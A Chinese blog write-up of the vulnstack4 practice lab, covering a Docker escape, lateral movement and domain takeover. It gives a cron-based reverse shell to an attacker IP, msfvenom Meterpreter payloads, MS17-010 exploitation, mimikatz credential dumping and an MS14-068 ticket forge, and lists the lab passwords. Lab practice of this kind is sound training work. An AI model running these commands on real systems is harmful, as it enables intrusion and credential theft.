【红日靶场】vulnstack4-完整渗透过程

news2025/1/16 2:47:48

系列文章目录

【红日靶场】vulnstack1-完整渗透过程
【红日靶场】vulnstack2-完整渗透过程
【红日靶场】vulnstack3-完整渗透过程


文章目录

  • 系列文章目录
  • 前言
  • 一、p环境初始化
    • web虚拟机配置
    • win7配置:
    • DC配置:
    • kaliLinux配置:
    • 机器密码
  • 二、开始渗透
    • 靶场学习渗透路径
    • 信息收集
    • 外网打点
    • 容器逃逸
      • 拿另一个2002端口
    • 内网探测
    • 小插曲
    • 横向移动
    • MS14-068 域提权漏洞
    • 其他方法:Linux上线cs


前言


提示:以下是本篇文章正文内容,下面案例可供参考

一、p环境初始化

无网络环境net1(157段可以换成NAT模式)和net2(183段):
在这里插入图片描述

web虚拟机配置

在这里插入图片描述

win7配置:

在这里插入图片描述

DC配置:

在这里插入图片描述

kaliLinux配置:

VMnet1网卡可以访问web:
在这里插入图片描述
全部开机

机器密码

ubuntu:ubuntu域成员机器
douser:Dotest123
DC:administrator:Test2008
对应的网络:
在这里插入图片描述
修改root密码:
在这里插入图片描述
重新启动docker
在这里插入图片描述
docker restart $(docker ps -aq)
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

二、开始渗透

靶场学习渗透路径

st漏洞利用
phpmyadmin getshell
tomcat 漏洞利用
docker逃逸
ms14-068
ssh密钥利用
流量转发
历史命令信息泄露
域渗透

目标:192.168.157.128

信息收集

在这里插入图片描述

在这里插入图片描述

外网打点

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
内网是在容器内:
在这里插入图片描述
传个冰蝎马:

在这里插入图片描述
传个马:
在这里插入图片描述
在这里插入图片描述
穿个冰蝎马:
在这里插入图片描述
内网是172段:现在是容器的root权限
容器环境确定:

ls -alh /.dockerenv
cat /proc/1/cgroup

在这里插入图片描述

容器逃逸

有wget命令:
在这里插入图片描述
这里不存在特权模式启动容器逃逸:判断是否是特权模式启动,如果是以特权模式启动的话,CapEff对应的掩码值应该为0000003fffffffff。
cat /proc/self/status |grep Cap
在这里插入图片描述
这个容器不具备逃逸的环境:
在这里插入图片描述

拿另一个2002端口

在这里插入图片描述
在这里插入图片描述
在传一个冰蝎马:
在这里插入图片描述
在这里插入图片描述
这个容器可能具备提权条件
在这里插入图片描述
再次逃逸:
mkdir /julien
在这里插入图片描述
在这里插入图片描述
kali监听:
在这里插入图片描述

弹shell到kali

touch /julien/julien.sh
echo "bash -i >& /dev/tcp/192.168.157.129/8888 0>&1" >/julien/julien.sh
echo "* * * * * root bash /julien.sh" >> /julien/etc/crontab

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
现在root权限直接改密码:
在这里插入图片描述
连接失败:
在这里插入图片描述
但是发现root没有ssh的权限:查看用户
在这里插入图片描述
修改Ubuntu的密码:连接成功
在这里插入图片描述
直接切换root权限:
在这里插入图片描述
上线msf:
生成木马:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.157.129 LPORT=5555 -f elf > shell.elf

kali监听:
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.157.129
set LPORT 5555
exploit
上传执行
在这里插入图片描述
在这里插入图片描述
做socke:
在这里插入图片描述

在这里插入图片描述
session现在是会自动加路由到内网段
在这里插入图片描述
直接做:
在这里插入图片描述
修改配置:vim /etc/proxychains4.conf

在这里插入图片描述
测试一下内网:
在这里插入图片描述

内网探测

直接fscan在kali中探测183网段:
在这里插入图片描述

小插曲

扫到一半发现好像少了一台:
这个win7应该是电源设置没做,大家记得做一下:
在这里插入图片描述

横向移动

可以看到:129和130主机存在ms17-010
在这里插入图片描述
使用ms17-010:

kali的地址为:192.168.157.129
win7:192.168.183.129
server2008:192.168.183.130
在这里插入图片描述
开始攻击:

在这里插入图片描述
没成功:
在这里插入图片描述
试一下130主机:
在这里插入图片描述
失败了

使用代理的msf尝试利用:

在这里插入图片描述
在这里插入图片描述
直接打蓝屏了win7:这次更猛直接卡死了
硬件关机都不行了,服了
在这里插入图片描述

终于在重启3次后成功了:
在这里插入图片描述
在这里插入图片描述
demo域:
在这里插入图片描述

尝试hash传递:(失败)
在这里插入图片描述

在这里插入图片描述

前面介绍中有个ms14-068的漏洞:作者已经为我们准备好了工具
在这里插入图片描述
mimikatz.exe
这里会列出密码
sekurlsa::logonpasswords

直接用mimikatz.exe抓取:先做持久化建用户
我这ms17-010没shell了:直接在win7操作
在这里插入图片描述
这个靶场有问题:直接任务管理器结束(主机不会关机)
在这里插入图片描述
直接使用正向由kali去连接win7:
生成:
msfvenom -p windows/meterpreter/bind_tcp -f exe -o shell.exe
放win7运行

use exploit/multi/handler
set payload  windows/meterpreter/bind_tcp
set rhost  192.168.183.130
run

MS14-068 域提权漏洞

​上面我们已经抓到密码了

条件:获得普通域用户以及密码 ,以及用户的suid ip为域控ip

ms14-068.exe -u douser@DEMO.com -s S-1-5-21-979886063-1111900045-1414766810-1107 -d 192.168.183.131 -p Dotest123

运行:mimikatz
mimikatz # kerberos::purge 清空凭证
mimikatz # kerberos::list 查看凭证

列表:
mimikatz # kerberos::ptc TGT_douser@demo.com.ccache 导入票据
在这里插入图片描述
成功拿到域控:
在这里插入图片描述

其他方法:Linux上线cs

这里感觉有点麻烦直接上线cs:
在这里插入图片描述
生成Linux马:

在这里插入图片描述
添加监听器:
在这里插入图片描述
在这里插入图片描述
成功上线:
在这里插入图片描述
这里是Ubuntu权限可以切换root执行:
在这里插入图片描述

在这里插入图片描述
这里不会用这个插件横向失败了,这里这个插件有会用的可以私我一下。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1111594.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

[论文精读]Graph Attention Networks

论文原文:[1710.10903] Graph Attention Networks (arxiv.org) 论文代码:https://github.com/PetarV-/GAT 英文是纯手打的!论文原文的summarizing and paraphrasing。可能会出现难以避免的拼写错误和语法错误,若有发现欢迎评论指…

《文献阅读》- 遗传算法作为量子近似优化算法的经典优化器(未完成)

文章目录 标题摘要关键词结论研究背景1.介绍 研究内容、成果3. 量子近似优化算法:基本概念及应用 常用基础理论知识2.相关工作酉矩阵 潜在研究点文献链接 标题 Genetic algorithms as classical optimizer for the Quantum Approximate Optimization Algorithm 参…

并发编程——2.基础概念及其它相关的概述

这篇文章我们来讲一下并发编程中的线程及其相关的概述内容。 目录 1.J.U.C 2.进程、线程、协程 2.1进程 2.2线程 2.3纤程(协程) 2.4概念小结 3.并发、并行、串行 3.1并发 3.2并行 3.3串行 3.4概念小结 4.CPU核心数和线程数的关系 5.上下文…

如何对发电机组进行负载测试

发电机组负载测试是为了评估其在不同负载条件下的性能和稳定性,下面是对发电机组进行负载测试的步骤: 准备工作: - 确定测试负载的类型和大小,例如,纯阻性负载、电动机负载等。 - 确保测试负载设备符合安全要求&#x…

C#选择排序(Selection Sort)算法

选择排序(Selection Sort)原理介绍 选择排序(Selection Sort)是一种简单的排序算法,其实现原理如下: 遍历待排序数组,从第一个元素开始。 假设当前遍历的元素为最小值,将其索引保存…

正点原子嵌入式linux驱动开发——Linux按键输入

在前几篇笔记之中都是使用的GPIO输出功能,还没有用过GPIO输入功能,本章就来学习一下如果在Linux下编写GPIO输入驱动程序。正点原子STM32MP1开发板上有三个按键,就使用这些按键来完成GPIO输入驱动程序,同时利用原子操作来对按键值进…

【Vue】v-if和v-show的区别

v-if&#xff1a;按条件渲染&#xff0c;判定为true时渲染&#xff0c;否则不渲染 v-show&#xff1a;按条件展示&#xff0c;区别在于切换的是display属性的值 <!DOCTYPE html> <html lang"en"> <head><meta charset"UTF-8">&l…

掌握JavaScript的练习之道:十个手写函数让你信手拈来!

&#x1f90d; 前端开发工程师&#xff08;主业&#xff09;、技术博主&#xff08;副业&#xff09;、已过CET6 &#x1f368; 阿珊和她的猫_CSDN个人主页 &#x1f560; 牛客高级专题作者、在牛客打造高质量专栏《前端面试必备》 &#x1f35a; 蓝桥云课签约作者、已在蓝桥云…

企业知识库系统:从0开始,部署企业知识库模型

当今竞争激烈的商业环境中&#xff0c;企业需要不断提高效率和降低成本&#xff0c;以保持竞争力。而建立一个高效的智能知识库&#xff0c;可以帮助企业实现这一目标。 部署企业知识库 但是知识库目前也需要相关专业的工具创建才能满足企业的业务需求&#xff0c;以HelpLook为…

将数组拆分成斐波那契序列

题目描述 示例 代码如下&#xff1a; public class SplitIntoFibonacci {LinkedList<Integer> res new LinkedList<>();public List<Integer> splitIntoFibonacci(String num) {if(num.length() < 3) return res;if(dfs(num, 0)) return res;return new…

【API篇】四、Flink物理分区算子API

文章目录 1、 分区算子&#xff1a;随机分区2、分区算子&#xff1a;轮询分区3、分区算子&#xff1a;重缩放分区4、分区算子&#xff1a;广播5、分区算子&#xff1a;全局分区6、自定义分区 重分区&#xff0c;即数据"洗牌"&#xff0c;将数据分配到下游算子的并行子…

优思学院|六西格玛品质管理概念,实现卓越品质的艺术

在竞争激烈的商业环境中&#xff0c;企业必须不断提高产品和服务的质量&#xff0c;以满足不断增长的客户需求。在这个背景下&#xff0c;六西格玛&#xff08;6σ&#xff09;管理理念应运而生。由摩托罗拉公司的比尔史密斯于1986年提出&#xff0c;六西格玛是一种管理策略&am…

Spring5学习笔记之整合MyBatis

✅作者简介&#xff1a;大家好&#xff0c;我是Leo&#xff0c;热爱Java后端开发者&#xff0c;一个想要与大家共同进步的男人&#x1f609;&#x1f609; &#x1f34e;个人主页&#xff1a;Leo的博客 &#x1f49e;当前专栏&#xff1a; Spring专栏 ✨特色专栏&#xff1a; M…

这4个网站太厉害了, 每一个都能帮你打开新世界大门

又是一期满满的干货&#xff01;今天给大家推荐几个小众但超好用的网站&#xff0c;每一个都能帮你打开新世界的大门&#xff01; 一、音分轨——在线人声分离网站 在线从任何音、视频中提取人声、伴奏和各种乐器&#xff0c;针对某一视频可以单独从里面提取人声或背景音乐&am…

Dreambooth工作原理

什么是Dreambooth 中文名&#xff1a;梦想亭。 Dreambooth 由 Google 研究团队于 2022 年发布&#xff0c;是一种通过向模型注入自定义主题来微调扩散模型&#xff08;如稳定扩散&#xff09;的技术。 所谓自定义主体&#xff0c;就是一张照片&#xff0c;但是照片主体要鲜明…

高校教务系统登录页面JS分析——广东工业大学

高校教务系统密码加密逻辑及JS逆向 本文将介绍高校教务系统的密码加密逻辑以及使用JavaScript进行逆向分析的过程。通过本文&#xff0c;你将了解到密码加密的基本概念、常用加密算法以及如何通过逆向分析来破解密码。 本文仅供交流学习&#xff0c;勿用于非法用途。 一、密码加…

分布式定时任务xxljob

xxl-job的xxl为作者名徐雪里拼音首字母。 xxl-job的作者是2015年开始开发这个项目&#xff0c;那时候springmvcbootstrapadminlte 大行其道&#xff0c;所以这个框架调度器一直沿用这个架构。 一、运行调度器 调度器可以集群或单点运行&#xff0c;以单点运行为例 下载代码…

Python学习笔记——文件操作、异常捕获、模块

食用说明&#xff1a;本笔记适用于有一定编程基础的伙伴们。希望有助于各位&#xff01; 文件读取 文件操作比较常见&#xff0c;通常我们需要对文件进行读取操作&#xff1a; f1 open(assets/Files/测试文件.txt, r, encodingUTF-8)# 辨别是否可读print(f1.readable())# 读取…

MYSQL常用函数详解

今天查缺陷发现同事写的一个MYSQL的SQL中用到函数JSON_CONTAINS&#xff0c;我当时第一反应是这个函数是Mysql8新加的么&#xff1f;原来小丑尽是我自己。 有必要巩固一下Mysql函数知识&#xff0c;并记录一下。&#xff08;如果对您也有用&#xff0c;麻烦您动动发财的手点个赞…

第六届“中国法研杯”司法人工智能挑战赛进行中!

第六届“中国法研杯”司法人工智能挑战赛 赛题上新&#xff01; 第六届“中国法研杯”司法人工智能挑战赛&#xff08;LAIC2023&#xff09;目前已发布司法大模型数据和服务集成调度 、证据推理、司法大数据征文比赛、案件要素识别四大任务。本届大赛中&#xff0c;“案件要素…